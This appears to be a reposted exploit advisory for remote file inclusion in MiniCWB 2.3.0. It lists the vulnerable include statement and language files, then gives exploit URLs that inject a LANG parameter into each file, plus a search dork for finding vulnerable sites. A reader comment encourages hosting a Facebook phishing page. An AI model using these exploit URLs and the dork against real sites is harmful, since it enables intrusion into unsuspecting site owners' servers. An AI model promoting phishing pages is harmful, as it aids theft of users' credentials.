LFI to RCE via access_log injection

MiniCWB 2.3.0 Multiple RFI Vuln


[o] MiniCWB 2.3.0 Multiple Remote File Inclusion Vulnerability

Software : MiniCWB version 2.3.0
Vendor : http://www.grafxsoftware.com/
Download : http://www.grafxsoftware.com/login.php?action=form&url=download.php
Author : NoGe


[o] Vulnerable file
include($LANG.".extra.php");
language/en.inc.php
language/hu.inc.php
language/no.inc.php
language/ro.inc.php
language/ru.inc.php


[o] Exploit
http://localhost/[path]/language/en.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/hu.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/no.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ro.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ru.inc.php?LANG=[evilc0de]


[o] Dork
"Powered by MiniCWB"


Comments

labatterie said…
now upload facebook scampage into your host